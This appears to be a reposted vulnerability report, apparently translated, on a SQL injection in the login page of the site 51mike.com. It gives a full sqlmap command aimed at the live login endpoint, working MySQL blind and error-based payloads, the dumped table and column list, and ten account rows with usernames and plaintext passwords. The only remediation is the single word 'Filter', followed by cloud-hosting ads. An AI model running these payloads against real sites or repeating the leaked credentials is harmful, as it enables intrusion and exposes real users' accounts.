51 Mike mcnet SQL injection can cause data leakage of millions of users
POST injection exists at the home page logon.
Http://www.51mike.com/pages/login/login.jsp? From = app & RSRU = http://www.51mike.com/
An error is reported when the j_username parameter of the BurpSuite packet is enclosed in single quotes.
sqlmap -u "http://www.51mike.com/j_security_check?from=app&RSRU=http://www.51mike.com/" --data "APP=web&topUrl=http%3A%2F%2Fwww.51mike.com%2F&j_username=admin&j_password=admin" -v 1 --level 5 --risk 3 -p "j_username" sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 10:58:39[10:58:39] [INFO] resuming back-end DBMS 'mysql'[10:58:39] [INFO] testing connection to the target URLsqlmap got a 302 redirect to 'http://www.51mike.com/pages/login/login.jsp'. Do you want to follow? [Y/n] nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: j_username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: APP=web&topUrl=http://www.51mike.com/&j_username=admin' RLIKE (SELECT (CASE WHEN (9667=9667) THEN 0x61646d696e ELSE 0x28 END)) AND 'YCDj'='YCDj&j_password=admin Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: APP=web&topUrl=http://www.51mike.com/&j_username=admin' AND (SELECT 2015 FROM(SELECT COUNT(*),CONCAT(0x7168647871,(SELECT (CASE WHEN (2015=2015) THEN 1 ELSE 0 END)),0x71726f7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KxBw'='KxBw&j_password=admin---[10:58:44] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0
Current database: 'user _ 51mi'
Database: user_51mike[32 tables]+---------------------------------------+| account || account_goods || account_honor || account_regip || alipay_kmoney_order || bill_kmoney_order || chat_gift_record || city || ebilling_kmoney_order || favorite || goods || honor || honor_info || ips_kmoney_order || jisu_mid || jnet_kmoney_order || kmoney_order || kmoney_recommand || kmoney_traffic || log_honor || paypal_kmoney_order || pk || province || role || snda_kmoney_order || tenpay_kmoney_order || turntable_player || uid_del || user_favorite || userinfo || userrole || usertrack |+---------------------------------------+
Database: user_51mikeTable: account[11 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| br | varchar(45) || charm | bigint(20) || id | bigint(20) || kmoney | bigint(20) || mark | bigint(20) || minor | varchar(45) || password | varchar(255) || popular | bigint(20) || register_date | datetime || role_id | bigint(20) || username | varchar(30) |+---------------+--------------+
Ten pieces of data are obtained for testing.
Database: user_51mikeTable: account[10 entries]+----+----------+-------------+| id | username | password |+----+----------+-------------+| 43 | Knet | shenrui || 44 | Kwang | shenrui || 45 | Forrest | 1 || 48 | Knews | shenrui || 49 | yueyue | 123456 || 51 | johnzhi | 8YJzT8YJzT || 52 | temple | shenrui || 56 | wzgd | 1 || 59 | ee11 | 07533563614 || 62 | yukking | 19820906 |+----+----------+-------------+
All are plain text ......
The data of millions of users may be leaked in plain text.
Solution:
Filter
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
